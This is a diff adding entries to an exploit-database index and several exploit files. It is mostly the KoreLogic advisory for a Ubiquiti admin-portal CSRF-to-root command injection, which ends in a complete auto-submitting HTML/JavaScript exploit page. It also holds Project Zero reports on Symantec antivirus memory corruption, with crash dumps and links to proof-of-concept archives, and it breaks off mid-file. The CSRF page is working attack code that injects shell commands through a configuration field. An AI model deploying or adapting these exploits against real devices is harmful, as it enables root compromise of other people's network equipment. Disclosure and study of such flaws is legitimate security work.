diff --git a/files.csv b/files.csv
index b95c5ac5d..b62935331 100755
--- a/files.csv
+++ b/files.csv
@@ -36204,3 +36204,16 @@ id,file,description,date,author,platform,type,port
 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80
+40031,platforms/multiple/dos/40031.txt,"Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0
+40032,platforms/multiple/dos/40032.txt,"Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0
+40034,platforms/multiple/dos/40034.txt,"Symantec Antivirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0
+40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
+40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
+40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
+40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
+40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
+40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
+40042,platforms/php/webapps/40042.php,"WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
+40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
+40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
+40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
diff --git a/platforms/cgi/webapps/40044.html b/platforms/cgi/webapps/40044.html
new file mode 100755
index 000000000..49ffa37be
--- /dev/null
+++ b/platforms/cgi/webapps/40044.html
@@ -0,0 +1,482 @@
+<!--
+KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
+
+Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
+Advisory ID: KL-001-2016-002
+Publication Date: 2016.06.28
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
+
+
+1. Vulnerability Details
+
+     Affected Vendor: Ubiquiti
+     Affected Product: AirGateway, AirFiber, mFi
+     Affected Version: 1.1.6, 3.2, 2.1.11
+     Platform: Embedded Linux
+     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
+                         CWE-77: Improper Neutralization of Special Elements
+                         used in a Command ('Command Injection')
+     Impact: Arbitrary Code Execution
+     Attack vector: HTTP
+
+2. Vulnerability Description
+
+     The Ubiquiti AirGateway, AirFiber and mFi platforms feature
+     remote administration via an authenticated web-based portal.
+     Lack of CSRF protection in the Remote Administration Portal,
+     and unsafe passing of user input to operating system commands
+     exectuted with root privileges, can be abused in a way that
+     enables remote command execution.
+
+3. Technical Description
+
+
+     The firmware files analyzed were
+     AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
+     firmware.bin respectively.
+
+     The MD5 hash values for the vulnerable files served by the
+     administration portal are:
+
+     AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
+     AirFiber   d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
+     mFi        960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
+
+     The firmware file contains a LZMA compressed, squashfs
+     partition. The binaries running on the embedded device are
+     compiled for a MIPS CPU. The device can be easily virtualized
+     using QEMU:
+
+     Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
+              -f /etc/lighttpd/lighttpd.conf
+
+     The administration portal does not issue a randomized CSRF
+     token either per session, page, or request.  Administration
+     authorization is solely based on cookie control. Therefore,
+     it is possible to embed JavaScript into an HTML page so when
+     an administrator is socially engineered into visiting the page,
+     the target device will be accessed with privileges.
+
+     Device configuration POST parameters include tokens passed to
+     operating system commands run as root in unsafe ways with
+     insufficient input sanitization.  Command injection is possible
+     by stacking shell commands in parameters such as
+     iptables.1.cmd.
+
+     In order for a developer to recreate this discovery, the
+     following instructions should be duplicated.
+
+     a. Authenticate to the target web application and navigate to the
+        SYSTEM page.
+     b. Download the current configuration.
+     c. Open the configuration in an editor of your choice, navigate to the
+        line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
+     d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
+     e. Save the changes, and submit the modified configuration. Apply the
+        changes using apply.cgi afterward.
+
+        Example:
+
+         POST /system.cgi HTTP/1.1
+         Host: 192.168.1.1
+         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
+         Gecko/20100101 Firefox/43.0
+         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
+         q=0.8
+         Accept-Language: en-US,en;q=0.5
+         Accept-Encoding: gzip, deflate
+         DNT: 1
+         Referer: https://192.168.1.1/system.cgi
+         Cookie: ui_language=en_US; last_check=1452020493426;
+         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
+         Connection: keep-alive
+         Content-Type: multipart/form-data;
+         boundary=---------------------------4384928471732886672453075690
+         Content-Length: 7204
+
+         ...
+         iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
+         ...
+
+         GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
+         Host: 192.168.1.1
+         X-Requested-With: XMLHttpRequest
+         Referer: https://192.168.1.1/system.cgi
+         Cookie: ui_language=en_US; last_check=1452020493426;
+         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
+         Connection: keep-alive
+
+     f. Change your IP address, but ensure continued routing to the target web
+        application. Incrementing the last octet is sufficient.
+     g. Open the configuration in an editor of your choice, navigate to the
+        modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
+     h. Repeat step 5 from the new IP address. You will receive the same
+        response. Apply the changes using the apply.cgi file.
+     i. Login to the target device using SSH or telnet, navigate to /var/tmp
+        and type ls.
+     j. You'll discover both files exist.
+
+4. Mitigation and Remediation Recommendation
+
+     At this time there is no vendor patch for this vulnerability.
+     The vendor was unable or unwilling to communicate an expected release
+     date for a proper mitigation.
+
+5. Credit
+
+     This vulnerability was discovered by Matt Bergin (@thatguylevel)
+     of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+     2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
+     2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
+     2016.04.12 - 30 business days have elapsed since the vulnerability was
+                  reported to Ubiquiti.
+     2016.04.21 - KoreLogic asks for an update on the remediation effort.
+     2016.04.29 - Ubiquiti replies that the patch will require
+                  "significant changes" but does not provide an estimate
+                  of the release time table.
+     2016.05.04 - 45 business days have elapsed since the vulnerability was
+                  reported to Ubiquiti.
+     2016.05.12 - KoreLogic requests an update from Ubiquiti.
+     2016.05.23 - KoreLogic requests an update from Ubiquiti.
+     2016.06.23 - 80 business days have elapsed since the vulnerability was
+                  reported to Ubiquiti.
+     2016.06.28 - Public disclosure.
+
+7. Proof of Concept
+
+     ########################################################################
+     #
+     # Copyright 2016 KoreLogic Inc., All Rights Reserved.
+     #
+     # This proof of concept, having been partly or wholly developed
+     # and/or sponsored by KoreLogic, Inc., is hereby released under
+     # the terms and conditions set forth in the Creative Commons
+     # Attribution Share-Alike 4.0 (United States) License:
+     #
+     #   http://creativecommons.org/licenses/by-sa/4.0/
+     #
+     #######################################################################*
+
+     This example has been performed against the AirGateway device running the
+     1.1.6 firmware version. In order to recreate this vulnerability on
+     AirFiber and mFi, the attacker should first obtain a valid copy of the
+     device configuration and update this proof-of-concept code.
+-->
+
+<html>
+  <body>
+    <form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
+      <input type="submit" value="Submit request" />
+    </form>
+
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https://192.168.1.1/system.cgi", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
+        xhr.withCredentials = true;
+        var body = "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"action\"\r\n" + 
+          "\r\n" + 
+          "fwupload\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"update_status\"\r\n" + 
+          "\r\n" + 
+          "enabled\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"hostname\"\r\n" + 
+          "\r\n" + 
+          "airGateway\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"timezone\"\r\n" + 
+          "\r\n" + 
+          "GMT\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"ui_language\"\r\n" + 
+          "\r\n" + 
+          "en_US\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"adminname\"\r\n" + 
+          "\r\n" + 
+          "ubnt\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"latitude\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "aaa.1.radius.acct.1.status=disabled\n" + 
+          "wpasupplicant.status=disabled\n" + 
+          "wpasupplicant.device.1.status=disabled\n" + 
+          "wireless.status=enabled\n" + 
+          "wireless.1.wds.status=disabled\n" + 
+          "wireless.1.wds.6.peer=\n" + 
+          "wireless.1.wds.5.peer=\n" + 
+          "wireless.1.wds.4.peer=\n" + 
+          "wireless.1.wds.3.peer=\n" + 
+          "wireless.1.wds.2.peer=\n" + 
+          "wireless.1.wds.1.peer=\n" + 
+          "wireless.1.status=enabled\n" + 
+          "wireless.1.ssid=www.ubnt.com\n" + 
+          "wireless.1.security.type=none\n" + 
+          "wireless.1.scan_list.status=disabled\n" + 
+          "wireless.1.mac_acl.policy=allow\n" + 
+          "wireless.1.mac_acl.status=disabled\n" + 
+          "wireless.1.hide_ssid=disabled\n" + 
+          "wireless.1.devname=ath0\n" + 
+          "wireless.1.autowds=disabled\n" + 
+          "wireless.1.authmode=1\n" + 
+          "wireless.1.ap=\n" + 
+          "wireless.1.addmtikie=enabled\n" + 
+          "vlan.status=disabled\n" + 
+          "users.status=enabled\n" + 
+          "users.1.status=enabled\n" + 
+          "users.1.password=VvpvCwhccFv6Q\n" + 
+          "users.1.name=ubnt\n" + 
+          "upnpd.devname=\n" + 
+          "upnpd.status=disabled\n" + 
+          "tshaper.status=disabled\n" + 
+          "telnetd.status=enabled\n" + 
+          "telnetd.port=23\n" + 
+          "system.modules.blacklist.status=disabled\n" + 
+          "system.eirp.status=disabled\n" + 
+          "system.cfg.version=65542\n" + 
+          "syslog.status=disabled\n" + 
+          "syslog.remote.status=\n" + 
+          "sshd.status=enabled\n" + 
+          "sshd.port=22\n" + 
+          "sshd.auth.passwd=enabled\n" + 
+          "snmp.status=disabled\n" + 
+          "route.1.devname=eth0\n" + 
+          "route.1.status=disabled\n" + 
+          "route.1.comment=\n" + 
+          "route.1.gateway=0.0.0.0\n" + 
+          "route.1.netmask=0\n" + 
+          "route.1.ip=0.0.0.0\n" + 
+          "route.status=enabled\n" + 
+          "resolv.nameserver.2.status=enabled\n" + 
+          "resolv.nameserver.2.ip=\n" + 
+          "resolv.nameserver.1.status=enabled\n" + 
+          "resolv.nameserver.1.ip=\n" + 
+          "resolv.status=disabled\n" + 
+          "radio.status=enabled\n" + 
+          "radio.countrycode=840\n" + 
+          "radio.1.txpower=18\n" + 
+          "radio.1.subsystemid=0xe4c2\n" + 
+          "radio.1.status=enabled\n" + 
+          "radio.1.reg_obey=disabled\n" + 
+          "radio.1.rate.mcs=7\n" + 
+          "radio.1.rate.auto=enabled\n" + 
+          "radio.1.obey=disabled\n" + 
+          "radio.1.mode=master\n" + 
+          "radio.1.mcastrate=\n" + 
+          "radio.1.low_txpower_mode=disabled\n" + 
+          "radio.1.ieee_mode=11nght20\n" + 
+          "radio.1.freq=0\n" + 
+          "radio.1.forbiasauto=1\n" + 
+          "radio.1.dfs.status=enabled\n" + 
+          "radio.1.devname=ath0\n" + 
+          "radio.1.cwm.mode=0\n" + 
+          "radio.1.cwm.enable=0\n" + 
+          "radio.1.countrycode=840\n" + 
+          "radio.1.clksel=1\n" + 
+          "radio.1.chanshift=\n" + 
+          "radio.1.chanbw=0\n" + 
+          "radio.1.antenna.id=4\n" + 
+          "radio.1.acktimeout=25\n" + 
+          "radio.1.ackdistance=600\n" + 
+          "pwdog.status=enabled\n" + 
+          "pwdog.retry=3\n" + 
+          "pwdog.period=300\n" + 
+          "pwdog.host=8.8.8.8\n" + 
+          "pwdog.delay=300\n" + 
+          "ppp.status=disabled\n" + 
+          "ntpclient.status=enabled\n" + 
+          "ntpclient.1.status=enabled\n" + 
+          "ntpclient.1.server=0.ubnt.pool.ntp.org\n" + 
+          "netmode=soho\n" + 
+          "netconf.5.up=enabled\n" + 
+          "netconf.5.hwaddr.mac=\n" + 
+          "netconf.5.hwaddr.status=disabled\n" + 
+          "netconf.5.autoip.status=disabled\n" + 
+          "netconf.5.role=mlan\n" + 
+          "netconf.5.mtu=1500\n" + 
+          "netconf.5.devname=eth0\n" + 
+          "netconf.5.status=disabled\n" + 
+          "netconf.4.up=enabled\n" + 
+          "netconf.4.netmask=255.255.255.0\n" + 
+          "netconf.4.ip=0.0.0.0\n" + 
+          "netconf.4.hwaddr.mac=\n" + 
+          "netconf.4.hwaddr.status=disabled\n" + 
+          "netconf.4.autoip.status=disabled\n" + 
+          "netconf.4.role=bridge_port\n" + 
+          "netconf.4.mtu=1500\n" + 
+          "netconf.4.devname=eth1\n" + 
+          "netconf.4.status=enabled\n" + 
+          "netconf.3.up=enabled\n" + 
+          "netconf.3.netmask=255.255.255.0\n" + 
+          "netconf.3.ip=192.168.1.1\n" + 
+          "netconf.3.hwaddr.mac=\n" + 
+          "netconf.3.hwaddr.status=disabled\n" + 
+          "netconf.3.autoip.status=disabled\n" + 
+          "netconf.3.role=lan\n" + 
+          "netconf.3.mtu=1500\n" + 
+          "netconf.3.devname=br0\n" + 
+          "netconf.3.status=enabled\n" + 
+          "netconf.2.up=enabled\n" + 
+          "netconf.2.promisc=enabled\n" + 
+          "netconf.2.netmask=255.255.255.0\n" + 
+          "netconf.2.ip=0.0.0.0\n" + 
+          "netconf.2.hwaddr.mac=\n" + 
+          "netconf.2.hwaddr.status=disabled\n" + 
+          "netconf.2.autoip.status=disabled\n" + 
+          "netconf.2.role=bridge_port\n" + 
+          "netconf.2.mtu=1500\n" + 
+          "netconf.2.devname=ath0\n" + 
+          "netconf.2.status=enabled\n" + 
+          "netconf.1.up=enabled\n" + 
+          "netconf.1.promisc=enabled\n" + 
+          "netconf.1.netmask=255.255.255.0\n" + 
+          "netconf.1.ip=0.0.0.0\n" + 
+          "netconf.1.hwaddr.mac=\n" + 
+          "netconf.1.hwaddr.status=disabled\n" + 
+          "netconf.1.autoip.status=disabled\n" + 
+          "netconf.1.role=wan\n" + 
+          "netconf.1.mtu=1500\n" + 
+          "netconf.1.devname=eth0\n" + 
+          "netconf.1.status=enabled\n" + 
+          "netconf.status=enabled\n" + 
+          "iptables.sys.upnpd.devname=\n" + 
+          "iptables.sys.upnpd.status=disabled\n" + 
+          "iptables.sys.status=enabled\n" + 
+          "iptables.sys.portfw.status=disabled\n" + 
+          "iptables.sys.mgmt.status=disabled\n" + 
+          "iptables.sys.masq.1.status=enabled\n" + 
+          "iptables.sys.masq.1.devname=eth0\n" + 
+          "iptables.sys.masq.status=enabled\n" + 
+          "iptables.sys.fw.status=disabled\n" + 
+          "iptables.sys.dmz.status=disabled\n" + 
+          "iptables.1.comment=\n" + 
+          "iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" + 
+          "iptables.1.status=enabled\n" + 
+          "iptables.status=enabled\n" + 
+          "igmpproxy.status=enabled\n" + 
+          "igmpproxy.upstream.devname=eth0\n" + 
+          "igmpproxy.1.downstream.devname=br0\n" + 
+          "httpd.status=enabled\n" + 
+          "httpd.session.timeout=900\n" + 
+          "httpd.port=80\n" + 
+          "httpd.https.status=enabled\n" + 
+          "httpd.https.port=443\n" + 
+          "gui.wlan.advanced.status=disabled\n" + 
+          "gui.network.advanced.status=enabled\n" + 
+          "ebtables.sys.vlan.status=disabled\n" + 
+          "ebtables.sys.status=enabled\n" + 
+          "ebtables.sys.eap.status=disabled\n" + 
+          "ebtables.sys.eap.1.status=enabled\n" + 
+          "ebtables.sys.eap.1.devname=ath0\n" + 
+          "ebtables.sys.arpnat.status=disabled\n" + 
+          "ebtables.sys.arpnat.1.status=enabled\n" + 
+          "ebtables.sys.arpnat.1.devname=ath0\n" + 
+          "ebtables.status=enabled\n" + 
+          "dyndns.status=disabled\n" + 
+          "dnsmasq.status=disabled\n" + 
+          "dnsmasq.1.status=disabled\n" + 
+          "dnsmasq.1.devname=eth0\n" + 
+          "discovery.status=enabled\n" + 
+          "discovery.cdp.status=enabled\n" + 
+          "dhcpd.1.start=192.168.1.2\n" + 
+          "dhcpd.1.netmask=255.255.255.0\n" + 
+          "dhcpd.1.lease_time=600\n" + 
+          "dhcpd.1.end=192.168.1.254\n" + 
+          "dhcpd.1.dnsproxy=enabled\n" + 
+          "dhcpd.1.devname=br0\n" + 
+          "dhcpd.1.dns.2.status=disabled\n" + 
+          "dhcpd.1.dns.2.server=\n" + 
+          "dhcpd.1.dns.1.status=disabled\n" + 
+          "dhcpd.1.dns.1.server=\n" + 
+          "dhcpd.1.status=enabled\n" + 
+          "dhcpd.status=enabled\n" + 
+          "dhcpc.1.status=enabled\n" + 
+          "dhcpc.1.fallback_netmask=255.255.255.0\n" + 
+          "dhcpc.1.fallback=192.168.10.1\n" + 
+          "dhcpc.1.devname=eth0\n" + 
+          "dhcpc.status=enabled\n" + 
+          "bridge.1.fd=1\n" + 
+          "bridge.1.comment=\n" + 
+          "bridge.1.port.2.devname=eth1\n" + 
+          "bridge.1.port.2.status=enabled\n" + 
+          "bridge.1.port.1.devname=ath0\n" + 
+          "bridge.1.port.1.status=enabled\n" + 
+          "bridge.1.stp.status=disabled\n" + 
+          "bridge.1.devname=br0\n" + 
+          "bridge.1.status=enabled\n" + 
+          "bridge.status=enabled\n" + 
+          "aaa.status=disabled\n" + 
+          "aaa.1.status=disabled\n" + 
+          "aaa.1.radius.macacl.status=disabled\n" + 
+          "aaa.1.radius.auth.1.status=disabled\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"cfgupload\"\r\n" + 
+          "\r\n" + 
+          "Upload\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"action\"\r\n" + 
+          "\r\n" + 
+          "cfgupload\r\n" + 
+          "-----------------------------761818923593135447208368355\r\n" + 
+          "Content-Disposition: form-data; name=\"systemdate\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------761818923593135447208368355--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+     submitRequest();
+     document.getElementById("airos-exploit-apply").submit();
+     </script>
+  </body>
+</html>
+
+<!--
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
+-->
\ No newline at end of file
diff --git a/platforms/multiple/dos/40031.txt b/platforms/multiple/dos/40031.txt
new file mode 100755
index 000000000..30a850937
--- /dev/null
+++ b/platforms/multiple/dos/40031.txt
@@ -0,0 +1,60 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810
+
+A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).
+
+By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.
+
+Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the the current version, literally hundreds of critical memory corruption bugs have been resolved.
+
+I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORTITY\SYSTEM on Windows and root on Linux and Mac.
+
+I have verified this on the following products:
+
+    Norton Antivirus, Windows
+    Symantec Endpoint Protection, Linux and Windows
+    Symantec Scan Engine, Linux and Windows
+
+Presumably this affects all other Symantec products using the core Symantec scan engine.
+
+In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.
+
+I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ(). 
+
+
+(534.adc): Access violation - code c0000005 (!!! second chance !!!)
+eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
+eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0         nv up ei ng nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
+ccScanw!filelengthi64+0x470b6:
+6d7b4016 8994be005d0000  mov     dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
+0:052> lm v mccScanw
+start    end        module name
+6d690000 6d8bf000   ccScanw    (export symbols)       C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Image name: ccScanw.dll
+    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
+    CheckSum:         0022B3ED
+    ImageSize:        0022F000
+    File version:     13.1.2.19
+    Product version:  13.1.2.19
+    File flags:       0 (Mask 3F)
+    File OS:          40004 NT Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0409.04b0
+    CompanyName:      Symantec Corporation
+    ProductName:      Symantec Security Technologies
+    InternalName:     ccScan
+    OriginalFilename: CCSCAN.DLL
+    ProductVersion:   13.1.2.19
+    FileVersion:      13.1.2.19
+    FileDescription:  Symantec Scan Engine
+    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.
+
+These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40031.zip
+
diff --git a/platforms/multiple/dos/40032.txt b/platforms/multiple/dos/40032.txt
new file mode 100755
index 000000000..b19149903
--- /dev/null
+++ b/platforms/multiple/dos/40032.txt
@@ -0,0 +1,41 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814
+
+The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.
+
+.text:00023D91 31 C0                          xor     eax, eax
+...
+.text:00023DAE 8D 95 E4 FB FF+                lea     edx, [ebp+var_41C]
+.text:00023DB4 89 D7                          mov     edi, edx
+.text:00023DC7 66 B9 00 01                    mov     cx, 100h
+.text:00023DCB F3 AB                          rep stosd
+
+We can see from this initialization that var_141C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:
+
+.text:0002442C 88 0C 10                       mov     [eax+edx], cl ; eax = &var_41C edx=index
+.text:0002442F 83 C2 01                       add     edx, 1 ; edx++
+...
+.text:00024408 81 FA 00 10 00+                cmp     edx, 1000h ; if (index > 4096) ...
+.text:0002440E 0F 84 E9 02 00+                jz      loc_246FD ; oob
+
+The index is checked to see if it's > 4096 bytes, this is incorrect. This is most likely a simple programmers error, bounds checking with the wrong size.
+
+This code is typically run with SYSTEM/root privileges, I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
+
+#0  0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
+#1  0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
+#2  0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
+#3  0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
+#4  0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) () 
+#5  0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
+(gdb) c
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+
+Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.
+
+This issue is remotely exploitable just by receiving an email, visiting a website, and so on.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40032.zip
+
diff --git a/platforms/multiple/dos/40034.txt b/platforms/multiple/dos/40034.txt
new file mode 100755
index 000000000..bc11605c4
--- /dev/null
+++ b/platforms/multiple/dos/40034.txt
@@ -0,0 +1,28 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818
+
+Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.
+
+This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.
+
+The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.
+
+Something like:
+
+char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100)
+
+// First change the content-type
+strcpy(buf, "Content-Type: ");
+strcpy(buf, NewContentType;
+strcpy(buf, "; name=\"");
+strcpy(buf, OldFileName);
+
+...
+UpdateName(buf, NewFileName);
+...
+
+This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40034.zip
+
diff --git a/platforms/multiple/dos/40035.txt b/platforms/multiple/dos/40035.txt
new file mode 100755
index 000000000..e85a9dea7
--- /dev/null
+++ b/platforms/multiple/dos/40035.txt
@@ -0,0 +1,31 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819
+
+Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker controlled value doesn't wrap:
+
+.text:000227B8 8D 42 01                       lea     eax, [edx+1]
